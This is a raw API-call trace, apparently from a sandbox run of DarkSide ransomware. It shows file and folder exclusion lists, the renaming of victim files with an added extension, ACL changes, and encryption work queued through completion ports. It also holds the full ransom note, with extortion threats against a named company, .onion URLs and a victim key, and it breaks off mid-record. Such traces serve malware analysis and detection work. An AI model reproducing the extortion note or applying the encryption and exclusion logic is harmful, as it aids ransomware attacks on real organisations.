nFileSizeLow=0xd916, dwReserved0=0x0, dwReserved1=0x0, cFileName="WmDmxrMTuu2.gif", cAlternateFileName="WMDMXR~1.GIF")) returned 1 [0148.583] _wcsicmp (_Str1="WmDmxrMTuu2.gif", _Str2="README.c06622a1.TXT") returned 5 [0148.583] wcsstr (_Str="WmDmxrMTuu2.gif", _SubStr="README") returned 0x0 [0148.583] _wcsicmp (_Str1="autorun.inf", _Str2="WmDmxrMTuu2.gif") returned -22 [0148.583] wcslen (_String="autorun.inf") returned 0xb [0148.583] _wcsicmp (_Str1="boot.ini", _Str2="WmDmxrMTuu2.gif") returned -21 [0148.583] wcslen (_String="boot.ini") returned 0x8 [0148.583] _wcsicmp (_Str1="bootfont.bin", _Str2="WmDmxrMTuu2.gif") returned -21 [0148.583] wcslen (_String="bootfont.bin") returned 0xc [0148.583] _wcsicmp (_Str1="bootsect.bak", _Str2="WmDmxrMTuu2.gif") returned -21 [0148.583] wcslen (_String="bootsect.bak") returned 0xc [0148.583] _wcsicmp (_Str1="desktop.ini", _Str2="WmDmxrMTuu2.gif") returned -19 [0148.583] wcslen (_String="desktop.ini") returned 0xb [0148.583] _wcsicmp (_Str1="iconcache.db", _Str2="WmDmxrMTuu2.gif") returned -14 [0148.583] wcslen (_String="iconcache.db") returned 0xc [0148.583] _wcsicmp (_Str1="ntldr", _Str2="WmDmxrMTuu2.gif") returned -9 [0148.583] wcslen (_String="ntldr") returned 0x5 [0148.583] _wcsicmp (_Str1="ntuser.dat", _Str2="WmDmxrMTuu2.gif") returned -9 [0148.583] wcslen (_String="ntuser.dat") returned 0xa [0148.583] _wcsicmp (_Str1="ntuser.dat.log", _Str2="WmDmxrMTuu2.gif") returned -9 [0148.583] wcslen (_String="ntuser.dat.log") returned 0xe [0148.583] _wcsicmp (_Str1="ntuser.ini", _Str2="WmDmxrMTuu2.gif") returned -9 [0148.583] wcslen (_String="ntuser.ini") returned 0xa [0148.583] _wcsicmp (_Str1="thumbs.db", _Str2="WmDmxrMTuu2.gif") returned -3 [0148.584] wcslen (_String="thumbs.db") returned 0x9 [0148.584] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0148.584] wcslen (_String="386") returned 0x3 [0148.584] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0148.584] wcslen (_String="adv") returned 0x3 [0148.584] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0148.584] wcslen (_String="ani") returned 0x3 [0148.584] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0148.584] wcslen (_String="bat") returned 0x3 [0148.584] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0148.584] wcslen (_String="bin") returned 0x3 [0148.584] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0148.584] wcslen (_String="cab") returned 0x3 [0148.584] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0148.584] wcslen (_String="cmd") returned 0x3 [0148.584] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0148.584] wcslen (_String="com") returned 0x3 [0148.584] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0148.584] wcslen (_String="cpl") returned 0x3 [0148.584] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0148.584] wcslen (_String="cur") returned 0x3 [0148.584] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0148.584] wcslen (_String="deskthemepack") returned 0xd [0148.584] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0148.584] wcslen (_String="diagcab") returned 0x7 [0148.584] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0148.584] wcslen (_String="diagcfg") returned 0x7 [0148.585] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0148.585] wcslen (_String="diagpkg") returned 0x7 [0148.585] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0148.585] wcslen (_String="dll") returned 0x3 [0148.585] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0148.585] wcslen (_String="drv") returned 0x3 [0148.585] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0148.585] wcslen (_String="exe") returned 0x3 [0148.585] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0148.585] wcslen (_String="hlp") returned 0x3 [0148.585] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0148.585] wcslen (_String="icl") returned 0x3 [0148.585] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0148.585] wcslen (_String="icns") returned 0x4 [0148.585] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0148.585] wcslen (_String="ico") returned 0x3 [0148.585] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0148.585] wcslen (_String="ics") returned 0x3 [0148.585] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0148.585] wcslen (_String="idx") returned 0x3 [0148.585] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0148.585] wcslen (_String="ldf") returned 0x3 [0148.585] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0148.585] wcslen (_String="lnk") returned 0x3 [0148.585] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0148.585] wcslen (_String="mod") returned 0x3 [0148.585] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0148.585] wcslen (_String="mpa") returned 0x3 [0148.585] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0148.586] wcslen (_String="msc") returned 0x3 [0148.586] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0148.586] wcslen (_String="msp") returned 0x3 [0148.586] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0148.586] wcslen (_String="msstyles") returned 0x8 [0148.586] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0148.586] wcslen (_String="msu") returned 0x3 [0148.586] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0148.586] wcslen (_String="nls") returned 0x3 [0148.586] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0148.586] wcslen (_String="nomedia") returned 0x7 [0148.586] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0148.586] wcslen (_String="ocx") returned 0x3 [0148.586] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0148.586] wcslen (_String="prf") returned 0x3 [0148.586] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0148.586] wcslen (_String="ps1") returned 0x3 [0148.586] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0148.586] wcslen (_String="rom") returned 0x3 [0148.586] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0148.586] wcslen (_String="rtp") returned 0x3 [0148.586] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0148.586] wcslen (_String="scr") returned 0x3 [0148.586] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0148.586] wcslen (_String="shs") returned 0x3 [0148.586] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0148.586] wcslen (_String="spl") returned 0x3 [0148.586] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0148.586] wcslen (_String="sys") returned 0x3 [0148.587] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0148.587] wcslen (_String="theme") returned 0x5 [0148.587] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0148.587] wcslen (_String="themepack") returned 0x9 [0148.587] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0148.587] wcslen (_String="wpx") returned 0x3 [0148.587] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0148.587] wcslen (_String="lock") returned 0x4 [0148.587] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0148.587] wcslen (_String="key") returned 0x3 [0148.587] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0148.587] wcslen (_String="hta") returned 0x3 [0148.587] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0148.587] wcslen (_String="msi") returned 0x3 [0148.587] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0148.587] wcslen (_String="pdb") returned 0x3 [0148.587] _wcsicmp (_Str1="sql", _Str2="gif") returned 12 [0148.587] wcslen (_String="sql") returned 0x3 [0148.587] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0148.587] wcslen (_String="sqlite") returned 0x6 [0148.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.587] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.587] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.587] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.587] wcscpy (in: _Dest=0x44d00cc, _Source="WmDmxrMTuu2.gif" | out: _Dest="WmDmxrMTuu2.gif") returned="WmDmxrMTuu2.gif" [0148.588] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmDmxrMTuu2.gif", dwFileAttributes=0x80) returned 1 [0148.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmDmxrMTuu2.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmdmxrmtuu2.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0148.588] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.588] ReadFile (in: hFile=0x138, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.589] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x63d6d3a2 [0148.589] RtlComputeCrc32 (PartialCrc=0xd3a2, Buffer=0x3feb74, Length=0x80) returned 0x40100a2b [0148.589] RtlComputeCrc32 (PartialCrc=0xa2b, Buffer=0x3feb74, Length=0x80) returned 0x125ec973 [0148.589] RtlComputeCrc32 (PartialCrc=0xc973, Buffer=0x3feb74, Length=0x80) returned 0x53ec0199 [0148.589] RtlComputeCrc32 (PartialCrc=0x199, Buffer=0x3feb74, Length=0x80) returned 0x7940838a [0148.589] CloseHandle (hObject=0x138) returned 1 [0148.589] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.589] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmDmxrMTuu2.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmDmxrMTuu2.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmDmxrMTuu2.gif" [0148.589] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmDmxrMTuu2.gif") returned 0x39 [0148.589] wcscpy (in: _Dest=0x44e00f2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.590] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmDmxrMTuu2.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmdmxrmtuu2.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmDmxrMTuu2.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmdmxrmtuu2.gif.c06622a1"), dwFlags=0x8) returned 1 [0148.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmDmxrMTuu2.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmdmxrmtuu2.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x138 [0148.592] CreateIoCompletionPort (FileHandle=0x138, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.592] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5120020 [0148.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7a5ec958 [0148.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d873746 [0148.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa131d46 [0148.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4089f00d [0148.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50c6ae5c [0148.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1b00ffa4 [0148.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6cb8fa04 [0148.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28e5431e [0148.603] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5120094, Length=0x80) returned 0xa7369dcb [0148.603] RtlComputeCrc32 (PartialCrc=0x9dcb, Buffer=0x5120094, Length=0x80) returned 0x10c86973 [0148.603] RtlComputeCrc32 (PartialCrc=0x6973, Buffer=0x5120094, Length=0x80) returned 0x4a62f779 [0148.603] RtlComputeCrc32 (PartialCrc=0xf779, Buffer=0x5120094, Length=0x80) returned 0x4b18baad [0148.603] RtlComputeCrc32 (PartialCrc=0xbaad, Buffer=0x5120094, Length=0x80) returned 0xc60412c6 [0148.603] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5120020) returned 1 [0148.603] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.603] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.603] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.603] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0148.603] _wcsicmp (_Str1="backup", _Str2="Desktop") returned -2 [0148.603] wcslen (_String="backup") returned 0x6 [0148.603] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0148.603] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0148.603] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdf989940, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdf989940, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0148.603] _wcsicmp (_Str1="$recycle.bin", _Str2="Documents") returned -64 [0148.603] wcslen (_String="$recycle.bin") returned 0xc [0148.604] _wcsicmp (_Str1="config.msi", _Str2="Documents") returned -1 [0148.604] wcslen (_String="config.msi") returned 0xa [0148.604] _wcsicmp (_Str1="$windows.~bt", _Str2="Documents") returned -64 [0148.604] wcslen (_String="$windows.~bt") returned 0xc [0148.604] _wcsicmp (_Str1="$windows.~ws", _Str2="Documents") returned -64 [0148.604] wcslen (_String="$windows.~ws") returned 0xc [0148.604] _wcsicmp (_Str1="windows", _Str2="Documents") returned 19 [0148.604] wcslen (_String="windows") returned 0x7 [0148.604] _wcsicmp (_Str1="appdata", _Str2="Documents") returned -3 [0148.604] wcslen (_String="appdata") returned 0x7 [0148.604] _wcsicmp (_Str1="application data", _Str2="Documents") returned -3 [0148.604] wcslen (_String="application data") returned 0x10 [0148.604] _wcsicmp (_Str1="boot", _Str2="Documents") returned -2 [0148.604] wcslen (_String="boot") returned 0x4 [0148.604] _wcsicmp (_Str1="google", _Str2="Documents") returned 3 [0148.604] wcslen (_String="google") returned 0x6 [0148.604] _wcsicmp (_Str1="mozilla", _Str2="Documents") returned 9 [0148.604] wcslen (_String="mozilla") returned 0x7 [0148.604] _wcsicmp (_Str1="program files", _Str2="Documents") returned 12 [0148.604] wcslen (_String="program files") returned 0xd [0148.604] _wcsicmp (_Str1="program files (x86)", _Str2="Documents") returned 12 [0148.604] wcslen (_String="program files (x86)") returned 0x13 [0148.604] _wcsicmp (_Str1="programdata", _Str2="Documents") returned 12 [0148.604] wcslen (_String="programdata") returned 0xb [0148.605] _wcsicmp (_Str1="system volume information", _Str2="Documents") returned 15 [0148.605] wcslen (_String="system volume information") returned 0x19 [0148.605] _wcsicmp (_Str1="tor browser", _Str2="Documents") returned 16 [0148.605] wcslen (_String="tor browser") returned 0xb [0148.605] _wcsicmp (_Str1="windows.old", _Str2="Documents") returned 19 [0148.605] wcslen (_String="windows.old") returned 0xb [0148.605] _wcsicmp (_Str1="intel", _Str2="Documents") returned 5 [0148.605] wcslen (_String="intel") returned 0x5 [0148.605] _wcsicmp (_Str1="msocache", _Str2="Documents") returned 9 [0148.605] wcslen (_String="msocache") returned 0x8 [0148.605] _wcsicmp (_Str1="perflogs", _Str2="Documents") returned 12 [0148.605] wcslen (_String="perflogs") returned 0x8 [0148.605] _wcsicmp (_Str1="x64dbg", _Str2="Documents") returned 20 [0148.605] wcslen (_String="x64dbg") returned 0x6 [0148.605] _wcsicmp (_Str1="public", _Str2="Documents") returned 12 [0148.605] wcslen (_String="public") returned 0x6 [0148.605] _wcsicmp (_Str1="all users", _Str2="Documents") returned -3 [0148.605] wcslen (_String="all users") returned 0x9 [0148.605] _wcsicmp (_Str1="default", _Str2="Documents") returned -10 [0148.605] wcslen (_String="default") returned 0x7 [0148.605] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0148.605] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0148.605] wcscpy (in: _Dest=0x4480094, _Source="Documents" | out: _Dest="Documents") returned="Documents" [0148.605] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0148.605] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0148.606] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.606] GetNamedSecurityInfoW () returned 0x0 [0148.606] SetEntriesInAclW () returned 0x0 [0148.606] SetNamedSecurityInfoW () returned 0x0 [0148.704] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57338) returned 1 [0148.704] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0148.704] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 1 [0148.705] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0148.705] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0148.705] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0148.706] CloseHandle (hObject=0x1c) returned 1 [0148.706] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0148.706] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.706] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="" [0148.706] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 0x2c [0148.706] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0148.707] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd7403960, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7403960, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.707] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21ab5570, ftCreationTime.dwHighDateTime=0x1d5bf3b, ftLastAccessTime.dwLowDateTime=0x7390e9a0, ftLastAccessTime.dwHighDateTime=0x1d55c7a, ftLastWriteTime.dwLowDateTime=0x7390e9a0, ftLastWriteTime.dwHighDateTime=0x1d55c7a, nFileSizeHigh=0x0, nFileSizeLow=0x1491e, dwReserved0=0x0, dwReserved1=0x0, cFileName="0_azADN_kj_yk z3GUN.docx", cAlternateFileName="0_AZAD~1.DOC")) returned 1 [0148.707] _wcsicmp (_Str1="0_azADN_kj_yk z3GUN.docx", _Str2="README.c06622a1.TXT") returned -66 [0148.707] wcsstr (_Str="0_azADN_kj_yk z3GUN.docx", _SubStr="README") returned 0x0 [0148.707] _wcsicmp (_Str1="autorun.inf", _Str2="0_azADN_kj_yk z3GUN.docx") returned 49 [0148.707] wcslen (_String="autorun.inf") returned 0xb [0148.707] _wcsicmp (_Str1="boot.ini", _Str2="0_azADN_kj_yk z3GUN.docx") returned 50 [0148.707] wcslen (_String="boot.ini") returned 0x8 [0148.707] _wcsicmp (_Str1="bootfont.bin", _Str2="0_azADN_kj_yk z3GUN.docx") returned 50 [0148.707] wcslen (_String="bootfont.bin") returned 0xc [0148.707] _wcsicmp (_Str1="bootsect.bak", _Str2="0_azADN_kj_yk z3GUN.docx") returned 50 [0148.707] wcslen (_String="bootsect.bak") returned 0xc [0148.707] _wcsicmp (_Str1="desktop.ini", _Str2="0_azADN_kj_yk z3GUN.docx") returned 52 [0148.707] wcslen (_String="desktop.ini") returned 0xb [0148.707] _wcsicmp (_Str1="iconcache.db", _Str2="0_azADN_kj_yk z3GUN.docx") returned 57 [0148.707] wcslen (_String="iconcache.db") returned 0xc [0148.707] _wcsicmp (_Str1="ntldr", _Str2="0_azADN_kj_yk z3GUN.docx") returned 62 [0148.707] wcslen (_String="ntldr") returned 0x5 [0148.707] _wcsicmp (_Str1="ntuser.dat", _Str2="0_azADN_kj_yk z3GUN.docx") returned 62 [0148.707] wcslen (_String="ntuser.dat") returned 0xa [0148.707] _wcsicmp (_Str1="ntuser.dat.log", _Str2="0_azADN_kj_yk z3GUN.docx") returned 62 [0148.707] wcslen (_String="ntuser.dat.log") returned 0xe [0148.708] _wcsicmp (_Str1="ntuser.ini", _Str2="0_azADN_kj_yk z3GUN.docx") returned 62 [0148.708] wcslen (_String="ntuser.ini") returned 0xa [0148.708] _wcsicmp (_Str1="thumbs.db", _Str2="0_azADN_kj_yk z3GUN.docx") returned 68 [0148.708] wcslen (_String="thumbs.db") returned 0x9 [0148.708] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0148.708] wcslen (_String="386") returned 0x3 [0148.708] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0148.708] wcslen (_String="adv") returned 0x3 [0148.708] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0148.708] wcslen (_String="ani") returned 0x3 [0148.708] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0148.708] wcslen (_String="bat") returned 0x3 [0148.708] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0148.708] wcslen (_String="bin") returned 0x3 [0148.708] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0148.708] wcslen (_String="cab") returned 0x3 [0148.708] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0148.708] 